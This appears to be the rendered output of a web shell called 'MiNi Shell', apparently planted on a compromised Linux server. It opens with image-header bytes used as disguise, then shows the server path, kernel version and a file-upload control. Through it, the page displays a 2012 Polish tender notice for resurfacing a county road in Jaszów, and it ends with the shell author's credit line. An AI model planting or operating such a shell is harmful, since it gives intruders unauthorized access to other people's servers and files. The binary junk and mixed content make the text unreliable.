JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121025/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121025/417528-N-2012.html

<p class="kh_header"><b>Brzeg: REMONT NAWIERZCHNI  DROGI POWIATOWEJ
                                        NR 1518 O W  M. JASZÓW</b><br>
<b>Numer ogłoszenia: 417528 - 2012; data zamieszczenia: 25.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Brzegu , ul. Wyszyńskiego 23, 49-300 Brzeg, woj. opolskie, tel. 077 4113840, faks 077 4113845.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdpbrzeg.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT NAWIERZCHNI  DROGI POWIATOWEJ
                                        NR 1518 O W  M. JASZÓW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie remontu nawierzchni jezdni  drogi powiatowej 
        Nr 1518 O w m. Jaszów  betonem asfaltowym (4 cm w-wa  ścieralna  +  2 cm , w-wa   
        wyrównawcza) wraz z pozostałymi robotami towarzyszącymi. Szczegółowy zakres do        
        wykonania zawiera  kosztorys ofertowy .
        Wykonanie zgodnie z  obowiązującymi  przepisami i normami .
W ramach  zamówienia wykonawca zobowiązany jest również do:
          - zachowania przepisów BHP
          - opracowania projektu zmiany organizacji ruchu drogowego na czas prowadzonych 
            robót zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 23 września 2003r. 
            w sprawie szczegółowych warunków zarządzania ruchem na drogach
            oraz wykonywania nadzoru nad   tym zarządzaniem (Dz.U. Nr 177, poz.1729 
            z późn.   zm.) zatwierdzony przez organ zarządzający ruchem na drogach    
            powiatowych  oraz jego utrzymania w trakcie  prowadzonych robót w należytym   
            stanie  technicznym i estetycznym, 
         - stosownego oznakowania sprzętu wykonującego remont,
         - wyposażenia swoich pracowników w kamizelki ostrzegawcze,
         - wykonawca jest odpowiedzialny i ponosi wszelkie koszty z tytułu strat materialnych     
            powstałych w związku z zaistnieniem zdarzęń losowych i z tytułu odpowiedzialności  
            cywilnej za szkody oraz następstwa nieszczęśliwych wypadków dotyczących    
            pracowników    i  osób trzecich - powstałe w związku z prowadzonymi robotami. Przedmiotowymi robotami musi kierować osoba posiadająca uprawnienia budowlane 
          o specjalności drogowej .   
Zaleca się , aby wykonawca dokonał wizji lokalnej terenu, którego dotyczy zamówienie     
         oraz zdobył wszelkie informacje niezbędne do przygotowania oferty i podpisania           
         umowy.
Podwykonawstwo
         Wykonawca może powierzyć podwykonawcom wykonanie części zamówienia ,   
         niemniej powierzenie danego zakresu zamówienia podwykonawcy wymaga, zgodnie
         z przepisem  art. 647 1  KC  uprzedniej pisemnej zgody Zamawiającego .W takim     
         przypadku Zamawiający wymaga wskazania w ofercie części zamówienia, która będzie   
         powierzona podwykonawcy. 
Utylizacja odpadów
         W trakcie wykonywania robót należy przestrzegać Ustawy o odpadach z dnia 
          27 kwietnia 2001r.  i Rozporządzenia i Ministra Środowiska w sprawie katalogu    
          odpadów z dnia 12 czerwca 2001r. 
Okres gwarancji wynosi 36 miesięcy od daty odbioru końcowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca (lub partnerzy konsorcjum łącznie)musi wykazać, że dysponuje lub 
                  będzie dysponować niżej wymienionymi w pełni  sprawnymi jednostkami sprzętu
                  i środkami transportu  zapewniającymi  wykonanie zamówienia 
                  - rozkładarka mas bitumicznych                                                 -  1 szt,
                  - skrapiarkę                                                                                  -  1 szt, 
                  - walec stalowy wibracyjny 10 Mg                                             -   1 szt,
                  - walec ogumiony                                                                        -   1 szt,
                  - samochody samowyładowcze min.15 Mg z przykryciem
                    lub termosy                                                                                 -  2 szt,
                 - piła do cięcia asfaltu                                                                    -  1 szt,
                 - frezarkę o szer.min.1,0 m                                                            -  1 szt,
                 lub posiada pisemne zobowiązanie innego podmiotu do udostępnienia ww.
                 jednostek sprzętu na okres korzystania z nich przy wykonywaniu zamówienia.

                 W przypadku składania oferty przez wykonawców ubiegających się wspólnie 
                 o  udzielenie zamówienia, ww. warunek  mogą spełniać łącznie
                 
                 Zamawiający dokona oceny spełniania  tego warunku na podstawie  
                 złożonych oświadczeń  dokumentów  na zasadzie  spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny warunku :

                      Wykonawca musi wykazać, że dysponuje lub będzie dysponował  
                       min.1osoba:

                       -   kierownik robót  -   min. 5 letnie doświadczenie na tym  od uzyskania
                            stanowisku  od uzyskania uprawnień i złoży stosowne oświadczenie , 
                            że osoba ta posiada wymagane  uprawnienia o specjalności drogowej, 
                            i przynależność do Izby Inżynierów Budownictwa  lub posiada pisemne 
                            zobowiązanie innego podmiotu do udostępnienia ww. osoby na okres 
                            korzystania z nich przy wykonywania zamówienia,                              
                           
                     W przypadku składania oferty przez wykonawców ubiegających się wspólnie 
                     o  udzielenie zamówienia, ww. warunek  mogą spełniać łącznie.
                
                    Zamawiający dokona oceny spełniania  tego warunku na podstawie  
                    złożonych oświadczeń dokumentów  na zasadzie  spełnia nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) OFERTA- wg załączonego wzoru do wypełnienia - zał. nr 1,
         2) KOSZTORYS OFERTOWY  - wg załączonego wzoru do wypełnienia- zał. nr 2,
3) zaakceptowany WZÓR  UMOWY - zał. nr 3,
4) zaakceptowana KARTA GWARANCYYJNA- zał. nr 4
         5) druk  dotyczący podwykonawstwa ( załącznik nr 11) 
         6) pełnomocnictwo do podpisywania oferty/reprezentacji o ile prawo do podpisywania, 
             reprezentacji nie wynika z innych dokumentów,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Termin wykonania przedmiotu umowy może ulec odpowiedniemu przedłużeniu o okres, w którym roboty
   nie będą mogły być wykonywane z powodu :
   - niekorzystnych warunków atmosferycznych  uniemożliwiających prawidłowe wykonanie tych 
     robót, gdy to wynika z technologii ich wykonania ,
-działania siły wyższej (np. klęski żywiołowej, powódź, strajki)mające bezpośredni wpływ na   
  terminowość wykonywania robót.
Przedłużenie terminu wykonania umowy w przypadku wystąpienia  ww.okoliczności, o których mowa 
  nastąpi na podstawie pisemnego aneksu do umowy, sporządzonego na pisemny  
   umotywowany  wniosek Wykonawcy, po zaakceptowaniu go przez Inspektora Nadzoru z ramienia
   zamawiającego.Rozliczenie nastąpi za rzeczywistą ilość wykonanych robót.Wynagrodzenie Wykonawcy stanowić
   będzie wynik iloczynu ilości wykonanych robót i ceny jednostkowej podanej w kosztorysie 
   ofertowym. 
W przypadku, gdyby wynagrodzenie Wykonawcy miało przekroczyć  kwotę określoną w §3 ust.1 umowy  
   Strony mogą dokonać zmiany tej kwoty w drodze aneksu do umowy.
W przypadku stwierdzenia konieczności wykonania robót dodatkowych oraz zamiennych, gdy ich  
   wykonanie będzie niezbędne do prawidłowego - zgodnego z zasadami wiedzy technicznej,  
   obowiązującymi przepisami i normami wykonania przedmiotu umowy określonego w §1 ust.2 umowy
   wynagrodzenie za te roboty będzie ustalone kosztorysem powykonawczym na podstawie faktycznie       
   wykonanych robót potwierdzonych przez inspektora nadzoru, uwzględniając składniki kalkulacyjne      
   jak w kosztorysie ofertowym Wykonawcy oraz protokółu konieczności potwierdzonego przez   
   Inspektora Nadzoru, głównego księgowego i zatwierdzonego przez Zamawiającego.
   Bez  zatwierdzenia przez Zamawiającego protokółu konieczności Wykonawca nie może rozpocząć
   robót  dodatkowych, zamiennych ani ograniczyć zakresu rzeczowego robót.
W przypadku wystąpienia składników kalkulacyjnych innych niż występują w kosztorysie 
   ofertowym, należy te składniki wycenić wg średnich cen z SEKONCENBUD- u za ostatni kwartał 
   poprzedzający sporządzenie kosztorysu powykonawczego, przy zachowaniu cen czynników 
   produkcji (R, M, S, Ko, Z)  podanych w ofercie oraz nakładów rzeczowych określonych
   w  Katalogach Nakładów Rzeczowych(KNR), a w przypadku braku określenia robót w KNR,  
   wg innych ogólnie stosowanych katalogów nakładów własnych zaakceptowanych
   przez Zamawiającego.  
Zamawiający dopuszcza również ograniczenie zakresu rzeczowego przedmiotu umowy,gdy  
   ich wykonanie okaże się zbędne tzw. roboty zaniechane. 
W przypadku zmiany przez władzę ustawodawczą  procentowej stawki podatku VAT ,    
   kwota brutto wynagrodzenia zostanie aneksem do niniejszej umowy odpowiednio  dostosowana.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdpbrzeg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Brzegu ul.Wyszyńskiego 23,49-300 Brzeg, pokój nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.11.2012 godzina 10:00, miejsce: Zarząd Dróg Powiatowych w Brzegu ul.Wyszyńskiego 23,49-300 Brzeg, pokój nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com